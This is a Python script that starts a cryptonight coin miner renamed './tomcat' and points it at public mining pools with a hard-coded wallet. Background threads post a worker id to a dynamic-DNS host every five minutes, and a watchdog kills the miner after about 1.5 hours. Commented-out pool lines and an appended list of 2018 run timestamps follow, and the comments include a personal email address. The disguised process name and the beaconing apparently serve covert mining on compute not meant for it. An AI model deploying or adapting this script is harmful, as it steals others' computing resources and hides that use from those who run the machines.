import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:25:07.935252
#2018-02-17 16:11:05.929128
#2018-02-17 17:58:05.854794
#2018-02-17 19:46:06.823425
#2018-02-17 21:34:05.067739
#2018-02-17 23:18:07.247191
#2018-02-18 01:06:06.639665
#2018-02-18 02:53:02.077638
#2018-02-18 04:42:02.034306
#2018-02-18 06:34:05.515347
#2018-02-18 08:22:03.709559
#2018-02-18 10:11:03.508073
#2018-02-18 11:57:03.763534
#2018-02-18 13:42:01.974408
#2018-02-18 15:32:07.511515
#2018-02-18 17:20:05.184266
#2018-02-18 19:09:07.525356
#2018-02-18 20:55:07.188067
#2018-02-18 22:42:08.275046
#2018-02-19 00:31:03.804938
#2018-02-19 02:16:08.079088
#2018-02-19 04:03:07.298239
#2018-02-19 05:47:06.933409
#2018-02-19 07:34:06.351052
#2018-02-19 09:24:06.905838
#2018-02-19 11:13:08.355736
#2018-02-19 12:59:09.401221
#2018-02-19 14:47:06.088584
#2018-02-19 16:37:01.792780
#2018-02-19 18:25:08.876343
#2018-02-19 20:12:07.266192
#2018-02-19 22:01:01.688049
#2018-02-19 23:46:05.985095
#2018-02-20 01:33:07.384176
#2018-02-20 03:21:07.600857
#2018-02-20 05:09:05.589273
#2018-02-20 06:51:05.872133
#2018-02-20 08:38:05.606535
#2018-02-20 10:22:01.536411
#2018-02-20 12:06:08.761411
#2018-02-20 13:54:06.020893
#2018-02-20 15:37:08.189683
#2018-02-20 17:23:01.701457
#2018-02-20 19:13:08.724899
#2018-02-20 21:02:07.676261
#2018-02-20 22:48:04.378444
#2018-02-21 00:32:05.513942
#2018-02-21 02:17:01.822830
#2018-02-21 04:04:07.109997
#2018-02-21 05:51:03.489468
#2018-02-21 07:39:06.490101
#2018-02-21 09:24:05.651238
#2018-02-21 11:12:09.196874
#2018-02-21 13:00:05.464740
#2018-02-21 14:48:02.022009
#2018-02-21 16:35:11.651635
#2018-02-21 18:24:06.881387
#2018-02-21 20:11:08.124416
#2018-02-21 21:58:05.325133
#2018-02-21 23:45:07.063494
#2018-02-22 01:35:04.430577
#2018-02-22 03:23:06.211083
#2018-02-22 05:10:07.787204
#2018-02-22 06:53:05.889005
#2018-02-22 08:39:04.236806
#2018-02-22 10:26:07.914919
#2018-02-22 12:13:07.951687
#2018-02-22 13:58:13.542293
#2018-02-22 15:45:01.445847
#2018-02-22 17:32:04.205652
#2018-02-22 19:18:01.808330
#2018-02-22 21:10:01.369036
#2018-02-22 22:56:07.826434
#2018-02-23 00:43:03.768623
#2018-02-23 02:32:02.195809
#2018-02-23 04:20:10.555898
#2018-02-23 06:06:04.171580
#2018-02-23 07:53:06.047999
#2018-02-23 10:15:08.463457
#2018-02-23 12:08:05.094665
#2018-02-23 13:55:06.680295
#2018-02-23 15:46:01.961033
#2018-02-23 17:32:04.908624
#2018-02-23 19:18:01.325181
#2018-02-23 21:01:04.631359
#2018-02-23 22:48:05.568137
#2018-02-24 00:37:08.485062
#2018-02-24 02:27:01.632778
#2018-02-24 04:17:06.518057
#2018-02-24 06:05:02.860122
#2018-02-24 07:52:05.052856
#2018-02-24 09:37:04.313492
#2018-02-24 11:32:05.481192
#2018-02-24 13:22:07.353163
#2018-02-24 15:12:04.190574
#2018-02-24 17:01:06.348761
#2018-02-24 18:49:06.498103
#2018-02-24 20:40:02.033127
#2018-02-24 22:47:05.281691
#2018-02-25 03:05:04.023865
#2018-02-25 07:08:06.998056